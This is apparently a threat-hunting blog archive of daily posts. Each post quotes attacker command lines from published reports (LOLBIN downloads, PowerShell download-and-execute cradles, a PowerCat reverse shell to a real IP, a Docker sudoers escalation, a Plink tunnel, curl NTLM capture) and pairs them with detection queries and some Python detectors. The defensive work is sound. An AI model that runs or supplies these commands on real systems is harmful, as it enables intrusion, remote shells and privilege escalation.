
Showing posts from November, 2025

334. Adversaries Use Device Credential Deployment for Hiding Artifacts

Hello everyone! Today we'll look at an example of how adversaries use Device Credential Deployment to hide a console window: Hide Artifacts: Hidden Window (T1564.003). According to this report, the adversary leveraged DeviceCredentialDeployment.exe to stealthily run cmd.exe. This binary shouldn't be run under normal circumstances, so its execution may point to malicious activity and is a good target for hunting:

event_type: "processcreatewin" AND proc_file_originalfilename: "devicecredentialdeployment.exe"

See you tomorrow!

333. Adversaries Use Multiple LOLBINs for Ingress Tool Transfer

Hello everyone! In almost every case adversaries need to download additional tools to the compromised system, and very often they use LOLBINs to do it. Let's look at some of them. For example, according to this report, the adversary leveraged multiple LOLBINs:

bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe

curl -o $public\libraries\service.exe http://<HOST>/service.exe

certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar

powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'

Such activities are great targets for hunting and detection, so make sure you are covering them. For example, BITSAdmin:

event_type: "processcreatewin" AND proc_file_path: "bitsadmin.exe" AND cmdline: "transfer"

See you tomorrow!
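As an added example (not code from the post or from the report it cites), the following Python turns the four LOLBIN download commands above into one detection function run over constructed process-creation events that use the post's field names (event_type, proc_file_path, cmdline), and extracts the download URL for triage; the curl --output and iwr aliases are my additions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

# Download indicators per LOLBIN, taken from the commands in the post above
# (iwr is the Invoke-WebRequest alias, --output the long form of curl -o;
# both added here as an assumption about what else to cover).
LOLBIN_DOWNLOAD_FLAGS = {
    "bitsadmin.exe": ("/transfer",),
    "curl.exe": ("-o", "--output"),
    "certutil.exe": ("-urlcache",),
    "powershell.exe": ("invoke-webrequest", "iwr"),
}

@dataclass(frozen=True)
class Finding:
    lolbin: str            # image name that performed the download
    url: Optional[str]     # first URL in the command line, for triage

def _image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _tokens(cmdline: str) -> List[str]:
    # Windows command lines are not POSIX-quoted; a whitespace split plus
    # quote stripping is enough to recover the flag tokens we look for.
    return [t.strip("\"'").lower() for t in cmdline.split()]

def detect_ingress_tool_transfer(event: dict) -> Optional[Finding]:
    """Return a Finding when a process-creation event shows a LOLBIN download."""
    if event.get("event_type") != "processcreatewin":
        return None
    image = _image_name(event.get("proc_file_path", ""))
    flags = LOLBIN_DOWNLOAD_FLAGS.get(image)
    if flags is None:
        return None
    cmdline = event.get("cmdline", "")
    tokens = set(_tokens(cmdline))
    if not any(flag in tokens for flag in flags):
        return None
    urls = URL_RE.findall(cmdline)
    return Finding(lolbin=image, url=urls[0] if urls else None)

# Constructed sample events modelled on the commands in the post.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -o $public\libraries\service.exe http://<HOST>/service.exe"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"""powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'" """},
    # benign: certutil used for its intended purpose, must not match
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -dump C:\\temp\\cert.cer"},
]

def run_samples() -> List[Optional[Finding]]:
    return [detect_ingress_tool_transfer(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for event, finding in zip(SAMPLE_EVENTS, run_samples()):
        print(f"{_image_name(event['proc_file_path']):16} -> {finding}")
```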

332. That's How Shai-Hulud 2.0 Escalates Privileges

Hello everyone! I'm sure you have already heard about Shai-Hulud, and we even talked about it already, but let's look at the new version and focus on the privilege escalation tactic. So, here's the report. Let's look at Figure 11. First, the adversary checks if passwordless sudo access is available:

sudo -n true

If not, it leverages Docker's privileged container access to mount the host filesystem and modify the sudoers configuration:

docker run --rm --privileged -v /:/host ubuntu bash -c "cp /host/tmp/runner /host/etc/sudoers.d/runner"

Both can be good hunting opportunities! Let's start with sudo:

event_type: "processcreatenix" AND cmdline: "sudo -n true"

And for Docker abuse:

event_type: "processcreatenix" AND cmdline: ("docker" AND "run" AND "privileged" AND "cp" AND "sudoers.d")

See you tomorrow!

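The Docker query above matches on bare keywords; as an added example (my code, not from the post or the report), this Python parses a docker run command line the way the post describes, checks whether the host's / is bind-mounted, and whether any argument writes under that mount's /etc/sudoers path, so the alert fires on the escalation pattern rather than on the words alone. It assumes the cmdline is a Linux process-creation command line and only handles the `docker run` form.

```python
import shlex
from typing import Dict, List

def _host_root_mounts(args: List[str]) -> List[str]:
    """Container paths at which the host's / is bind-mounted via -v / --volume."""
    targets = []
    for i, tok in enumerate(args):
        spec = None
        if tok in ("-v", "--volume") and i + 1 < len(args):
            spec = args[i + 1]
        elif tok.startswith(("-v=", "--volume=")):
            spec = tok.split("=", 1)[1]
        if spec:
            parts = spec.split(":")          # host_path:container_path[:options]
            if len(parts) >= 2 and parts[0] == "/":
                targets.append(parts[1].rstrip("/"))
    return targets

def assess_docker_cmdline(cmdline: str) -> Dict[str, object]:
    """Flag `docker run` that mounts the host root and touches its sudoers config."""
    try:
        args = shlex.split(cmdline)
    except ValueError:                       # unbalanced quotes: treat as unparseable
        args = []
    is_run = (len(args) >= 2
              and args[0].rsplit("/", 1)[-1] == "docker"
              and args[1] == "run")
    mounts = _host_root_mounts(args) if is_run else []
    # any argument (e.g. the bash -c payload) that references <mount>/etc/sudoers*
    touches = any(f"{m}/etc/sudoers" in arg for m in mounts for arg in args)
    return {
        "docker_run": is_run,
        "privileged": is_run and "--privileged" in args,
        "host_root_mounts": mounts,
        "touches_host_sudoers": touches,
        "suspicious": is_run and bool(mounts) and touches,
    }

# Constructed samples: the command from the post plus two benign-looking ones.
SAMPLE_CMDLINES = [
    'docker run --rm --privileged -v /:/host ubuntu bash -c '
    '"cp /host/tmp/runner /host/etc/sudoers.d/runner"',
    "docker run --rm -v /srv/data:/data alpine ls /data",            # ordinary bind mount
    "docker run --rm -v /:/mnt:ro alpine cat /mnt/etc/hostname",     # host root, no sudoers
]

def run_samples() -> List[Dict[str, object]]:
    return [assess_docker_cmdline(c) for c in SAMPLE_CMDLINES]

if __name__ == "__main__":
    for cmd, result in zip(SAMPLE_CMDLINES, run_samples()):
        print(result["suspicious"], cmd)
```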

331. Adversaries Keep Abusing Microsoft Management Console

Hello everyone! Today we'll look at another example of proxy execution, and focus on the following sub-technique: System Binary Proxy Execution: MMC (T1218.014). According to this report, Water Gamayun leveraged malicious MSC files, which exploited MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe and used TaskPad snap-in commands to run PowerShell commands, for example:

powershell.exe" -w H -eC aQBlAHgAIAAoACcAcABvAF8AdwBlAF8AcgBzAF8AaABlAF8AbABsACAALQBlAF8AQwAgAFMAUQBCAHUAQQBIAFkAQQBiAF8AdwBCAHIAQQBHAFUAQQBMAFEAQgBYAEEARwBVAEEAWQBnAEIAUwBBAEcAVQBBAGMAUQBfAEIAMQBBAEcAVQBBAGMAdwBCADAAQQBDAEEAQQBMAFEAQg[redacted]

So, in this case, mmc.exe spawns powershell.exe. We can turn that into a query:

event_type: "processcreatewin" AND proc_p_file_path: "mmc.exe" AND proc_file_path: "powershell.exe"

See you tomorrow!

330. Adversaries Use Windows Event Logs for Discovery

Hello everyone! We often use Windows Event Logs during our incident response engagements, but adversaries may also use them, for example, for discovery. Let's dig into this report. The adversary leveraged SharpADUserIP, which enables them to collect user names and their IP addresses from the Security log, as well as the following PowerShell command to extract similar information from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational:

powershell -Command Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }}

So, we can hunt for suspicious...

329. Adversaries Use Blender 3D Files to Deliver Stealers

Hello everyone! I always love to see creative ways of malware delivery. This time adversaries leveraged malicious .blend files uploaded to free 3D asset sites. According to the report, an embedded Python script fetched a loader, a PowerShell script, from a workers[.]dev URL. The script downloads two archives: one contains a Python environment with StealC, the other a Python stealer. So, what to hunt for? Some examples:

- Execution of suspicious .blend files.
- Communications with workers[.]dev initiated by suspicious processes.
- Suspicious LNK files in the Startup folder.
- Execution of suspicious Python scripts (yes, they are; for example, ZalypaGyliveraV1.py).

See you tomorrow!

328. Adversaries Use PowerCat for Reverse Shells

Hello everyone! I have mentioned already that sometimes threat actors want to be caught. Let's look at another case and a tool I don't often see used ITW. According to this report, the adversary leveraged PowerShell to download and execute PowerCat, an open-source PowerShell-based Netcat utility, to start a reverse shell:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString('hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1'); powercat -c 154.17.26[.]41 -p 8080 -e cmd

As you may have noticed, the adversary didn't rename the tool, and in many cases this is a very common practice. The same can be said about the repository: threat actors often abuse PowerShell to download tools from official sources. So, it's another notable thing to document and build your detections on, for example:

event_type: "processcreatewin" AND cmdline: "powercat"

Don't forget about the script block - it also contains...

327. Adversaries Use Shell Icon Overlay Handlers for Persistence

Hello everyone! Let's look at another uncommon persistence mechanism, which involves abusing Shell Icon Overlay handlers and registry modification. Advanced techniques are for advanced adversaries, so today we'll look at Lazarus (or Lazer Werewolf). As part of persistence, the threat actors modified the following registry key:

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers

This allows the adversary to abuse the Shell Icon Overlay handler to load the payload each time the user logs in. So it's another notable registry key to monitor:

event_type: "registryvaluesetwin" AND reg_key_path: "ShellIconOverlayIdentifiers"

See you tomorrow!

326. Adversaries Abuse XstExport to Extract Emails Before Exfiltration

Hello everyone! Espionage-focused adversaries often show interest in emails. In some cases they even read them before exfiltration, and they may need some tools to export them! According to this report, the adversary leveraged XstExport, a legitimate open-source tool for exporting the content of Microsoft Outlook OST and PST files:

XstExport.exe -e <email>@<domain>.ost2

You don't use it in your environment? Why not hunt for it!

event_type: "processcreatewin" AND proc_file_productname: "XstExport"

See you tomorrow!

325. Can We Use Discovery Techniques for Hunting?

Hello everyone! A very typical behaviour marker for many malware families is executing system discovery commands. And, of course, we can use it for threat hunting! Let's look at the TamperedChef campaign. The adversary performs a registry query to look for the victim's machine ID:

reg.exe QUERY "HKLM\Software\Microsoft\Cryptography" /v MachineGuid

If we use it for hunting, we'll have to filter lots and lots of false positives, but still it may be a good hypothesis: just focus on parent processes. In our example the parent is quite suspicious, as it's node.exe, so we can use it to build a query:

event_type: "processcreatewin" AND proc_p_file_path: "node.exe" AND proc_file_path: "reg.exe" AND cmdline: "machineguid"

See you tomorrow!

324. Adversaries Use HideMouse to Hide Evidence of Remote Access

Hello everyone! We often talk about how adversaries abuse RMMs, so let's talk a bit about a curious case of how they hide evidence of remote access. According to this report, the threat actors used HideMouse, a utility that hides mouse cursor movement, so they can use the ScreenConnect they installed previously. Another hunting (or even detection!) opportunity, right?

event_type: "processcreatewin" AND proc_file_productname: "HideMouse"

See you tomorrow!

323. Adversaries Keep Using NetExec: Forensic Perspective

Hello everyone! Let's look at NetExec one more time, but this time focus on the forensic perspective and related artifacts. Recently the tool was used by Lynx ransomware affiliates. And according to the report, it creates multiple folders and files, which can be used both for detection and forensic analysis. Among others, it creates a .nxc folder and lots of databases, for example, smb.db, rdp.db, winrm.db, etc. The databases contain the results of execution of the corresponding modules, and may be a forensic goldmine! Also, searching for suspicious folder and file creation events may be a good option as well:

event_type: "filecreatewin" AND file_path: ("nxc.conf" OR "ftp.db" OR "ldap.db" OR "mssql.db" OR "nfs.db" OR "rdp.db" OR "smb.db" OR "ssh.db" OR "vnc.db" OR "winrm.db" OR "wmi.db")

See you tomorrow!

322. Is It Easy to Detect a PowerShell Abuse?

Hello everyone! We often talk about PowerShell. Yes, adversaries love it. But is it difficult to detect? Let's find out! As always, we need an example, so let's check a report by eSentire. The adversary executed the following command:

powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('hxxp://87.120.219[.]26/P9m4H7S2FqDTof')"

What can we learn from it? The threat actors use some interesting command line arguments, and we can use them for hunting, of course:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: ("executionpolicy" AND "bypass")

It's just an example, but usually adversaries use a quite limited set of suspicious arguments, so make sure to document them! See you tomorrow!

321. Adversaries Use Outlook LoadMacroProviderOnBoot for Persistence

Hello everyone! Today we'll talk about another uncommon persistence mechanism, which is not very popular, but still can be seen ITW. And it involves Modify Registry (T1112). So, to gain persistent access to the compromised system, the adversary modified several registry entries. One of these was LoadMacroProviderOnBoot under software\microsoft\office\16.0\outlook. If enabled, it allows the automatic loading of any configured VBA macros on startup. Worth a hunt, right?

event_type: "registryvaluesetwin" AND reg_key_path: "LoadMacroProviderOnBoot" AND reg_value_data: "0x00000001"

See you tomorrow!

320. Adversaries Abuse Finger in ClickFix Attacks

Hello everyone! Reading the news, I spotted another interesting variant of a ClickFix attack, so let's look at the available hunting opportunities. According to the post, the adversary used the Finger executable to download a payload from a remote server and execute it via cmd, for example:

"cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER'"

It's not the first time threat actors have used this executable, but as it's not commonly used in modern environments, finger.exe execution may be a suspicious behavior marker in itself:

event_type: "processcreatewin" AND proc_file_path: "finger.exe"

See you tomorrow!

319. Adversaries Abuse JSON Storage Services for Malware Delivery

Hello everyone! Let's keep digging into how adversaries misuse legitimate web services, and this time we'll look at JSON storage services. According to this report, adversaries started to use JSON storage services like JSON Keeper, JSONsilo, and npoint.io to host and deliver malware from trojanized code projects. This knowledge gives us a hunting opportunity:

event_type: "dnsreq" AND dns_rname: ("jsonkeeper.com" OR "jsonsilo.com" OR "npoint.io")

See you tomorrow!

318. Adversaries Use PowerShell to Hunt for Password Stores

Hello everyone! It's time to update your PowerShell collection with another procedure example, this time related to discovery and credential access. Let's look into the report on Red Likho. The adversary leveraged PowerShell to collect information on KeePass-related files:

powershell.exe "Get-ChildItem -Path 'C:\Users\','$env:PROGRAMFILES','env:ProgramFiles(x86)' -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName"

And here we have another hunting opportunity:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: (*keepass* AND *kdbx*)

See you tomorrow!

317. Adversaries Use AppleScript Files More and More Often

Hello everyone! We don't talk a lot about macOS attacks, so let's change that and look at some examples of Masquerading: Double File Extension (T1036.007). Researchers note that adversaries have used .scpt AppleScript files more and more often in recent months. Examples include both advanced threats like BlueNoroff and commodity malware, for example, Odyssey Stealer and MacSync Stealer. Adversaries commonly create fake .docx and .pptx files: Stable1 Investment Proposal (Draft) (EN).pptx.scpt, AM Management _Strategic OTC Collaboration Proposal.docx.scpt. This gives us some simple detection opportunities:

event_type: "processcreatemac" AND cmdline: (*pptx.scpt OR *.docx.scpt)

See you tomorrow!

316. Adversaries Keep Using Plink and Putty to Establish a Reverse SSH Tunnel

Hello everyone! Let's keep talking about how adversaries misuse various legitimate tools, and this time talk a bit about Protocol Tunneling (T1572). According to this report, the threat actors leveraged both Plink and Putty to set up an encrypted tunnel:

C:\windows\temp\sihosts.exe -batch -hostkey "ssh-rsa 2048 SHA256:<REDACTED>" -ssh -P 433 -l <REDACTED> -pw <REDACTED> -R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46

C:\windows\temp\silcon.exe -ssh -P 433 -l <REDACTED> -pw <REDACTED> -R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46

Yes, we're dealing with renamed executables again, and yes, executables can be renamed legitimately, but it still gives us good hunting opportunities:

event_type: "processcreatewin" AND proc_file_originalfilename: "putty" AND NOT proc_file_path: "putty.exe"

And the same for Plink:

event_type: "processcreatewin" AND proc_file_originalfilename: "...
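As an added example (my code, not from the post or the report), this Python combines the two hunts in one pass over constructed process-creation events: it flags a PuTTY/Plink binary whose PE OriginalFilename does not match its file name, and parses each -R option so the analyst sees what the tunnel actually publishes (here, local RDP). The expected file names and the OriginalFilename values in the samples are assumptions for this example.

```python
from typing import Dict, List, Optional, Tuple

# PE OriginalFilename prefix -> image name the file should have on disk.
# The prefixes mirror the post's query; the expected file names are assumed.
EXPECTED_IMAGE = {"putty": "putty.exe", "plink": "plink.exe"}

# (listen_host, listen_port, dest_host, dest_port) for one -R option
Forward = Tuple[str, int, str, int]

def _image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def renamed_ssh_client(event: Dict[str, str]) -> Optional[str]:
    """Return 'putty' or 'plink' when PE metadata says so but the file name does not."""
    if event.get("event_type") != "processcreatewin":
        return None
    original = event.get("proc_file_originalfilename", "").lower()
    image = _image_name(event.get("proc_file_path", ""))
    for tool, expected in EXPECTED_IMAGE.items():
        if original.startswith(tool) and image != expected:
            return tool
    return None

def parse_remote_forwards(cmdline: str) -> List[Forward]:
    """Extract -R [listen_host:]listen_port:dest_host:dest_port specs.
    Defanged '[.]' is refanged first; IPv6 specs are skipped rather than guessed."""
    tokens = cmdline.replace("[.]", ".").split()
    forwards: List[Forward] = []
    for i, tok in enumerate(tokens[:-1]):
        if tok != "-R":
            continue
        parts = tokens[i + 1].strip("\"'").split(":")
        if len(parts) == 3:                  # listen host omitted
            parts = ["*"] + parts
        if len(parts) != 4 or not (parts[1].isdigit() and parts[3].isdigit()):
            continue
        forwards.append((parts[0], int(parts[1]), parts[2], int(parts[3])))
    return forwards

def assess_tunnel_event(event: Dict[str, str]) -> Dict[str, object]:
    forwards = parse_remote_forwards(event.get("cmdline", ""))
    return {
        "renamed_tool": renamed_ssh_client(event),
        "remote_forwards": forwards,
        # the post's case: local RDP published on the remote side of the tunnel
        "exposes_local_rdp": any(dest.startswith("127.") and port == 3389
                                 for _, _, dest, port in forwards),
    }

# Constructed events modelled on the two command lines in the post, plus a
# benign PuTTY session under its own name with no port forwarding.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\windows\temp\sihosts.exe",
     "proc_file_originalfilename": "PuTTY",
     "cmdline": r'C:\windows\temp\sihosts.exe -batch -hostkey "ssh-rsa 2048 SHA256:<REDACTED>" -ssh -P 433 -l <REDACTED> -pw <REDACTED> -R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46'},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\windows\temp\silcon.exe",
     "proc_file_originalfilename": "Plink",
     "cmdline": r'C:\windows\temp\silcon.exe -ssh -P 433 -l <REDACTED> -pw <REDACTED> -R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46'},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Program Files\PuTTY\putty.exe",
     "proc_file_originalfilename": "PuTTY",
     "cmdline": r'"C:\Program Files\PuTTY\putty.exe" -ssh admin@jumphost.example'},
]

def run_samples() -> List[Dict[str, object]]:
    return [assess_tunnel_event(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, run_samples()):
        print(_image_name(event["proc_file_path"]), result)
```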

315. Adversaries Abuse CURL to Collect Authentication Material

Hello everyone! Today we'll look at another curious example of Forced Authentication (T1187), and a threat actor dubbed Sticky Werewolf. So, the adversary keeps expanding its arsenal, and now uses Pulsar RAT. During the analysis of a recent campaign, we observed that the cluster leveraged cURL to obtain authentication material:

cmd.exe curl -u : --ntlm hxxp://194.226.121[.]225

And yes, we have another good candidate for hunting:

event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: ("u" AND "ntlm")

See you tomorrow!

314. Adversaries Abuse PowerShell to Create Shortcuts for Persistence

Hello everyone! Let's keep digging into PowerShell procedures, and this time we'll look at how adversaries leverage it for persistence. And today's example is generously provided by Lazarus (or Lazer Werewolf, among many other names). The adversary used PowerShell to create a shortcut in the startup folder and enable persistence:

cmd.exe /C powershell -Command "$s = (New-Object -COMWScript.Shell).CreateShortcut('C:\\ProgramData\\USOShared\\Micro.lnk'); $s.TargetPath = 'C:\\Windows\\System32\\rundll32.exe'; $s.Arguments = '\"[USOPrivate.dll path]\" LoadMimi \"C:\\Windows\\System32\\cmd.exe\"'; $s.Save()"

Similar behavior markers may be related to legitimate activity, so it's a good target for hunting:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: "CreateShortcut"

See you tomorrow!

313. Here's How Real Adversaries Abuse PowerShell for Discovery

Hello everyone! Today we'll look at another example of PowerShell abuse, and this time we'll talk about the Discovery tactic. So, let's look into the report on Gootloader. There are multiple interesting examples of PowerShell abuse. The adversary uses it to search for accounts with SPNs:

powershell.exe -command "$search = New-Object DirectoryServices.DirectorySearcher([ADSI]''); $search.Filter = '(&(servicePrincipalName=*)(objectCategory=user))'; $results = $search.FindAll(); foreach ($result in $results) { $u = $result.GetDirectoryEntry(); Write-Host $u.name, $u.samaccountname; foreach ($s in $u.servicePrincipalName) { Write-Host $s; } Write-Host '---'; }"

It also finds computers where the current user has admin rights:

powershell.exe -ExecutionPolicy bypass -Command "$UBcPGBjR99={param($vars);$nZzkzLTK99=$vars.computer;$Error.clear();Get-WmiObject -Class Win32_OperatingSystem -ComputerName $nZzkzLTK99 -ErrorAction SilentlyContinue;...

312. Hunting for Certutil Abuse

Hello everyone! Let's talk about another legitimate utility that is commonly abused by adversaries and is a great target for hunting. I'm talking about certutil. It's usually used to obtain certificate authority information and configure Certificate Services, but adversaries use it to solve other tasks, of course. And here's an example:

certutil.exe -decode C:\Windows\..\ProgramData\bEyjSIpZvbJpjVv9.a9oc C:\Windows\..\ProgramData\hkNlPHP61rvE0T7J.lpxQ

So, here the adversary uses the tool to decode the payload, but it's not the only case. Threat actors may also use it to download or encode data. Let's build a query based on all the cases:

event_type: "processcreatewin" AND proc_file_path: "certutil.exe" AND cmdline: ("decode" OR "encode" OR "url" OR "urlcache" OR "verifyctl")

See you tomorrow!

311. Hunting for MSBuild Abuse

Hello everyone! Adversaries love proxy execution, and they can use trusted developer utilities to achieve it. Today we'll look at an example of Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001). As always, we need an example. The adversary created a scheduled task to execute a malicious XML file with msbuild.exe:

schtasks /create /tn \Microsoft\Windows\Ras\Outbound /tr "CSIDL_WINDOWS\microsoft.net\framework\v4.0.30319\msbuild.exe c:\programdata\microsoft\rac\outbound\outbound.xml" /sc minute /mo 60 /ru system

We can hunt for msbuild.exe executing files from suspicious folders or with suspicious extensions, for example:

event_type: "processcreatewin" AND proc_file_path: "msbuild.exe" AND cmdline: "programdata"

See you tomorrow!

310. Adversaries Keep Abusing Uncommon RMMs

Hello everyone! Adversaries keep experimenting with various remote management platforms, so today we'll look at another example of Remote Access Tools: Remote Desktop Software (T1219.002). Let's look at UNK_SmudgedSerpent. The adversary leveraged phishing emails for credential harvesting as well as to deliver archives with MSI files that loaded RMM payloads. In most cases the threat actors used PDQConnect Remote Monitoring & Management software. If you don't use it in your environment, it may be a good target for hunting:

event_type: "processcreatewin" AND proc_file_productname: "PDQConnectAgent"

You can also hunt for related domains:

event_type: "dnsreqwin" AND dns_rname: "app.pdq.com"

See you tomorrow!

309. Adversaries Use Hidden Hyper-V Virtual Machines

Hello everyone! Using virtual machines for defense evasion is becoming more and more popular. Today we'll look at another example of Hide Artifacts: Run Virtual Instance (T1564.006). According to the report, the adversary enabled the Hyper-V feature on a compromised Windows machine, then downloaded and imported a lightweight Alpine Linux-based VM containing their malware. Once downloaded, the virtual machine was imported using PowerShell:

"cmd.exe" /C powershell.exe -c import-vm -path "c:\\programdata\\microsoft\\AppV\\app\\Virtual Machines\\1DBCC80B-5803-4AF1-8772-712C688F408A.vmcx" -Copy -GenerateNewId > c:\\Programdata\\WindowsUpdateTask_t.tmp 2>&1

PowerShell was also used to start the newly imported virtual machine:

"cmd.exe" /C powershell.exe -c Start-VM -name WSL > c:\\Programdata\\WindowsUpdateTask_R.tmp 2>&1

For example, we can hunt for cmdlets related to virtual machine manipulation:

event_type: "processcreatewin" ...

308. Adversaries Abuse OpenAI Assistants API

Hello everyone! Today we'll look at another curious example of how adversaries abuse AI to solve various problems; this time they leveraged the OpenAI Assistants API. Microsoft DART uncovered a new malware, SesameOp, which uses the OpenAI Assistants API for its command-and-control communications. The infection chain consists of a loader (Netapi64.dll) and a .NET-based backdoor (OpenAIAgent.Netapi64). Netapi64.dll is loaded at runtime into the host executable via .NET AppDomainManager injection, as instructed by a crafted .config file accompanying the host executable. So, it's a good hunting idea to look for suspicious connections to api[.]openai[.]com:

event_type: "dnsreqwin" AND dns_rname: "api.openai.com"

See you tomorrow!

307. Hunting for Tar Abuse

Hello everyone! The malware installation process often involves unpacking archived data. And today we'll look at how adversaries abuse tar, and how to use it for threat hunting. Let's look at UNC6384. The adversary leveraged a malicious LNK file, which contained the following command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"

The script does the following...

306. Adversaries Modify Registry to Enable Remote Debugging

Hello everyone! I'm sure you know that adversaries abuse the remote debugging feature to extract cookies from web browsers. Today we'll look at how threat actors modify the registry to enable this feature. If you look through this report, you'll notice that the adversary abused reg.exe to modify the registry and allow remote debugging:

reg.exe add HKEY_CURRENT_USER\Software\Policies\Google\Chrome /v RemoteDebuggingAllowed /t REG_DWORD /d 1 /f

For example, we can hunt for reg.exe abuse:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: "RemoteDebuggingAllowed"

Or you can focus on the registry modification itself:

event_type: "registryvaluesetwin" AND reg_key_path: "RemoteDebuggingAllowed"

See you tomorrow!

305. BRONZE BUTLER Abuses Cloud Storage Services for Exfiltration

Hello everyone! Today we'll look at another example of Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002). According to the report, BRONZE BUTLER accessed multiple cloud storage services via the web browser during remote desktop sessions in order to exfiltrate collected information. If such services are not commonly used in your environment, it's a good target for hunting:

event_type: "dnsreqwin" AND dns_rname: ("file.io" OR "ppng.io" OR "limewire.com")

See you tomorrow!